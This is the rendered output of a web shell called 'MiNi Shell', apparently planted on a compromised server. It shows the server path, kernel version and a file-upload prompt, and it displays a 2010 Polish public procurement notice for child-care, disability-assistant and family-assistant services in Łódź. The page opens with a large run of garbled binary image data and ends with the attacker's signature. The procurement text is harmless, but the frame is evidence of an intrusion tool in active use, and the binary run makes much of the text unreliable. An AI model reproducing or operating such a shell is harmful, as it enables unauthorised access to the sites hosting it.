JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100607/158178-N-2010.html

<p class="kh_header"><b>Łódź: Zapewnienie usługi opiekuna oraz asystenta w ramach realizacji projektu Nowy Obraz pomocy społecznej w Łodzi - poddziałanie 7.1.1.
                          Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 158178 - 2010; data zamieszczenia: 07.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Łodzi , ul. Piotrkowska 149, 90-440 Łódź, woj. łódzkie, tel. 0-42 6324034, faks 0-42 6324130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Miejski Ośrodek Pomocy Społecznej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zapewnienie usługi opiekuna oraz asystenta w ramach realizacji projektu Nowy Obraz pomocy społecznej w Łodzi - poddziałanie 7.1.1.
                          Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego obejmuje 3 części:

1. Przedmiotem zamówienia jest zorganizowanie opieki nad osobami zależnymi uczestników projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki.
Zakres rzeczowy zamówienia obejmuje:
    1) zorganizowanie opieki w domu uczestników projektu w dniach i w godzinach, podczas których uczestnicy projektu będą dojeżdżać oraz brać udział w zajęciach realizowanych w ramach projektu,
    2) opieka obejmuje 40 dzieci uczestników projektu w wymiarze do 100 godzin opieki na jednego uczestnika
    3)  Zamawiający zastrzega sobie możliwość skierowania mniejszej liczby osób,
    4)  Przedmiot zamówienia nie obejmuje kosztów dojazdów opiekunki do miejsca świadczenia usług opiekuńczych
     
2.   przedmiotem zamówienia jest zorganizowanie i zapewnienie usług asystenta osoby niepełnosprawnej uczestnikom projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki.
      Zakres rzeczowy zamówienia obejmuje:
      1) usługa będzie świadczona na terenie Łodzi, w wymiarze nie przekraczającym łącznie 9 000 godzin asysty w dni robocze i w dni wolne od pracy w zależności od potrzeb zdiagnozowanych przez pracownika socjalnego osoby niepełnosprawnej,
      2)  Wykonawca zapewni wsparcie asystenta osoby niepełnosprawnej dla 25 osób niepełnosprawnych w wymiarze 40 godz. miesięcznie na jedną osobę w okresie lipiec-listopad 2010 r. ,
       3) miejscem pracy asystenta osoby niepełnosprawnej będzie przede wszystkim środowisko domowe i najbliższe otoczenie osoby niepełnosprawnej,
       4) asystent osoby niepełnosprawnej będzie wspierał realizację programu integracji społecznej i zawodowej danej osoby niepełnosprawnej według założonej w projekcie ścieżki uczestnictwa,
       5) asystent osoby niepełnosprawnej będzie wspomagał osobę niepełnosprawną w komunikacji z otoczeniem, w tym świadczył pomoc w załatwianiu spraw urzędowych i innych,
       6) asystent osoby niepełnosprawnej będzie  świadczył pomoc w poruszaniu się po mieście i w korzystaniu ze środków transportu,
       7) asystent osoby niepełnosprawnej będzie pobudzał aktywność  osoby niepełnosprawnej, jej rodziny oraz najbliższego otoczenia celem udzielania jak najefektywniejszej pomocy,
        8) asystent osoby niepełnosprawnej będzie towarzyszył jej w kontaktach społecznych - udział w imprezach kulturalnych, wyjściach do kin, teatrów, muzeów, na koncerty, na spotkania towarzyskie, na zakupy itp,
        9) asystent osoby niepełnosprawnej zorganizuje wspólne spędzanie czasu wolnego mające na celu rozwój zainteresowań,
       10) asystent osoby niepełnosprawnej zobowiązany jest do prowadzenia karty czasu pracy oraz okresowej sprawozdawczości z wykonywanych działań.
       11) zamawiający zastrzega sobie możliwość skierowania mniejszej liczby osób.
       12) asystent osoby niepełnosprawnej nie może być skazany prawomocnym wyrokiem sądu za przestępstwa przeciwko życiu lub zdrowiu oraz przeciwko mieniu,
      13) asystent osoby niepełnosprawnej powinien posiadać wykształcenie minimum średnie 


3.  Przedmiotem zamówienia jest zorganizowanie i zapewnienie usług asystenta rodzinnego uczestników projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki.
      Zakres rzeczowy zamówienia obejmuje:
.   1) Wykonawca zapewni wsparcie asystenta rodziny dla 20 rodzin w wymiarze 40 godzin miesięcznie na jedną rodzinę w okresie lipiec-listopad 2010 r,
     2)  miejscem pracy asystenta rodziny będzie przede wszystkim środowisko domowe i najbliższe otoczenie rodziny,
     3)  asystent rodziny będzie ją wspierał poprzez konsultacje i działania o charakterze edukacyjnym w zakresie:
            a) prawidłowego wychowania i opieki nad dziećmi (organizowanie czasu wolnego dzieciom, budowanie prawidłowych więzi między członkami rodziny, rozwijanie umiejętności wychowawczych aktywne uczestnictwo w życiu szkolnym dziecka),
          b) dbania o zdrowie (higiena, pielęgnacja, prawidłowe odżywianie, rekreacja, w razie potrzeby: leczenie i rehabilitacja),
              c) gospodarowania budżetem domowym (planowanie i monitorowanie wydatków, oszczędne gospodarowanie mediami),
        d) wykonywania prac na rzecz domu oraz ich podziału na członków rodziny (sprzątanie, zmywanie, gotowanie, prasowanie, remont itd.),
       e) pozyskiwania usług na rzecz domu i rodziny (np. związanych z naprawą, załatwianiem spraw urzędowych znalezieniem pracy, kontaktów ze służbą zdrowia),
         f)  usamodzielniania się poprzez uzupełnianie wykształcenia i podjęcie pracy, dbałości o edukację dzieci, 
  4) asystent rodzinny będzie propagował wzorce prawidłowego funkcjonowania społecznego poprzez edukację i trening w zakresie obowiązujących norm współżycia społecznego,
   5)   asystent rodziny będzie dbał o rozszerzanie kontaktów rodzinnych, zapewnienie dostępu do nowych, wzbogaconych doświadczeń (ułatwianie klientowi nawiązywania kontaktów z innymi, w zależności od jego potrzeb i umiejętności; stymulowanie podopiecznego do samodzielnego poszukiwania w swoim otoczeniu nowych możliwości: sił, osób grup instytucji lub ułatwianie mu tego np. poprzez towarzyszenie),
     6) asystent rodziny zobowiązany będzie do prowadzenia karty czasu pracy i okresowej sprawozdawczości z wykonywanych działań.

     7) Zamawiający zastrzega sobie możliwość skierowania mniejszej liczby rodzin.
     8) asystent rodzinny nie może być prawomocnie skazany za przestępstwo przeciwko życiu lub zdrowiu oraz przeciwko mieniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0, 85.31.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunkó udziału w postępowaniu okreśonych w art. 22 ust. 1 u.p.z.p. - wg. zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części I i II oświadczenie o spełnianiu warunkó udziału w postępowaniu okreśonych w art. 22 ust. 1 u.p.z.p. - wg. zał nr 2 do siwz
dla części III 2.1. w zakresie części  III przedmiotu zamówienia wykonawca zapewni osoby posiadające wykształcenie uprawniające do wykonywania zawodu pracownika socjalnego, zgodnie z przepisami ustawy z dnia 12 marca 2004 r.  Pomocy społecznej (Dz.U. Z 2009 r. Nr 175, poz. 1362 ze z.)   
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków.
Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnego doświadczenia na okres korzystania z niego przy wykonywaniu zamówienia.
Ocena spełniania warunku wskazanego w punkcie 2.1. nastąpi na podstawie przedstawionych przez Wykonawców oświadczeń, o których mowa w rozdziale 6 punkcie 6.3.  IDW.
6.3. na potwierdzenie spełniania warunku szczegółowego określonego w ppkt 2.1. IDW:
    oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia jeżeli ustawa nakłada obowiązek posiadania takich uprawnień tj. że  posiadają wykształcenie określone w rozdziale 5 pkt 2 ppkt. 2.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunkó udziału w postępowaniu okreśonych w art. 22 ust. 1 u.p.z.p. - wg. zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunkó udziału w postępowaniu okreśonych w art. 22 ust. 1 u.p.z.p. - wg. zał nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunkó udziału w postępowaniu okreśonych w art. 22 ust. 1 u.p.z.p. - wg. zał nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.4. W stosunku do wykonawców zagranicznych zastosowanie maja przepisy   rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U z 2006r nr 87 pozycja 605 ze. zm.).
Jeżeli dokumenty sporządzone są w języku obcym, to należy składać je   wraz  z tłumaczeniem na język polski poświadczonym przez Wykonawcę.

Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność  z oryginałem przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społęcznej w Łodzi ul. Piotrkowska149, sekretariat II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2010 godzina 11:00, miejsce: Miejski Ośrodek Pomocy Społęcznej w Łodzi ul. Piotrkowska149, sekretariat II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest zorganizowanie opieki nad osobami zależnymi uczestników projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Przedmiotem zamówienia jest zorganizowanie opieki nad osobami zależnymi uczestników projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki.
Zakres rzeczowy zamówienia obejmuje:
    1) zorganizowanie opieki w domu uczestników projektu w dniach i w godzinach, podczas których uczestnicy projektu będą dojeżdżać oraz brać udział w zajęciach realizowanych w ramach projektu,
    2) opieka obejmuje 40 dzieci uczestników projektu w wymiarze do 100 godzin opieki na jednego uczestnika
    3)  Zamawiający zastrzega sobie możliwość skierowania mniejszej liczby osób,
    4)  Przedmiot zamówienia nie obejmuje kosztów dojazdów opiekunki do miejsca świadczenia usług opiekuńczych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przedmiotem zamówienia jest zorganizowanie i zapewnienie usług asystenta osoby niepełnosprawnej uczestnikom projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest zorganizowanie i zapewnienie usług asystenta osoby niepełnosprawnej uczestnikom projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki.
      Zakres rzeczowy zamówienia obejmuje:
      1) usługa będzie świadczona na terenie Łodzi, w wymiarze nie przekraczającym łącznie 9 000 godzin asysty w dni robocze i w dni wolne od pracy w zależności od potrzeb zdiagnozowanych przez pracownika socjalnego osoby niepełnosprawnej,
      2)  Wykonawca zapewni wsparcie asystenta osoby niepełnosprawnej dla 25 osób niepełnosprawnych w wymiarze 40 godz. miesięcznie na jedną osobę w okresie lipiec-listopad 2010 r. ,
       3) miejscem pracy asystenta osoby niepełnosprawnej będzie przede wszystkim środowisko domowe i najbliższe otoczenie osoby niepełnosprawnej,
4) asystent osoby niepełnosprawnej będzie wspierał realizację programu integracji społecznej i zawodowej danej osoby niepełnosprawnej według założonej w projekcie ścieżki uczestnictwa,
       5) asystent osoby niepełnosprawnej będzie wspomagał osobę niepełnosprawną w komunikacji z otoczeniem, w tym świadczył pomoc w załatwianiu spraw urzędowych i innych,
       6) asystent osoby niepełnosprawnej będzie  świadczył pomoc w poruszaniu się po mieście i w korzystaniu ze środków transportu,
       7) asystent osoby niepełnosprawnej będzie pobudzał aktywność  osoby niepełnosprawnej, jej rodziny oraz najbliższego otoczenia celem udzielania jak najefektywniejszej pomocy,
        8) asystent osoby niepełnosprawnej będzie towarzyszył jej w kontaktach społecznych - udział w imprezach kulturalnych, wyjściach do kin, teatrów, muzeów, na koncerty, na spotkania towarzyskie, na zakupy itp,
        9) asystent osoby niepełnosprawnej zorganizuje wspólne spędzanie czasu wolnego mające na celu rozwój zainteresowań,
       10) asystent osoby niepełnosprawnej zobowiązany jest do prowadzenia karty czasu pracy oraz okresowej sprawozdawczości z wykonywanych działań.
       11) zamawiający zastrzega sobie możliwość skierowania mniejszej liczby osób.
       12) asystent osoby niepełnosprawnej nie może być skazany prawomocnym wyrokiem sądu za przestępstwa przeciwko życiu lub zdrowiu oraz przeciwko mieniu,
      13) asystent osoby niepełnosprawnej powinien posiadać wykształcenie minimum średnie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest zorganizowanie i zapewnienie usług asystenta rodzinnego uczestników projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i zapewnienie usług asystenta rodzinnego uczestników projektu Nowy obraz pomocy społecznej w Łodzi realizowanego przez Miejski Ośrodek Pomocy Społecznej w Łodzi w ramach Poddziałania 7.1.1. Programu Operacyjnego Kapitał Ludzki.
      Zakres rzeczowy zamówienia obejmuje:
.   1) Wykonawca zapewni wsparcie asystenta rodziny dla 20 rodzin w wymiarze 40 godzin miesięcznie na jedną rodzinę w okresie lipiec-listopad 2010 r,
     2)  miejscem pracy asystenta rodziny będzie przede wszystkim środowisko domowe i najbliższe otoczenie rodziny,
     3)  asystent rodziny będzie ją wspierał poprzez konsultacje i działania o charakterze edukacyjnym w zakresie:
            a) prawidłowego wychowania i opieki nad dziećmi (organizowanie czasu wolnego dzieciom, budowanie prawidłowych więzi między członkami rodziny, rozwijanie umiejętności wychowawczych aktywne uczestnictwo w życiu szkolnym dziecka),
          b) dbania o zdrowie (higiena, pielęgnacja, prawidłowe odżywianie, rekreacja, w razie potrzeby: leczenie i rehabilitacja),
              c) gospodarowania budżetem domowym (planowanie i monitorowanie wydatków, oszczędne gospodarowanie mediami),
        d) wykonywania prac na rzecz domu oraz ich podziału na członków rodziny (sprzątanie, zmywanie, gotowanie, prasowanie, remont itd.),
       e) pozyskiwania usług na rzecz domu i rodziny (np. związanych z naprawą, załatwianiem spraw urzędowych znalezieniem pracy, kontaktów ze służbą zdrowia),
         f)  usamodzielniania się poprzez uzupełnianie wykształcenia i podjęcie pracy, dbałości o edukację 4) asystent rodzinny będzie propagował wzorce prawidłowego funkcjonowania społecznego poprzez edukację i trening w zakresie obowiązujących norm współżycia społecznego,
   5)   asystent rodziny będzie dbał o rozszerzanie kontaktów rodzinnych, zapewnienie dostępu do nowych, wzbogaconych doświadczeń (ułatwianie klientowi nawiązywania kontaktów z innymi, w zależności od jego potrzeb i umiejętności; stymulowanie podopiecznego do samodzielnego poszukiwania w swoim otoczeniu nowych możliwości: sił, osób grup instytucji lub ułatwianie mu tego np. poprzez towarzyszenie),
     6) asystent rodziny zobowiązany będzie do prowadzenia karty czasu pracy i okresowej sprawozdawczości z wykonywanych działań.

     7) Zamawiający zastrzega sobie możliwość skierowania mniejszej liczby rodzin.
     8) asystent rodzinny nie może być prawomocnie skazany za przestępstwo przeciwko życiu lub zdrowiu oraz przeciwko mieniu. dzieci,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.31.21.00-0, 85.31.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com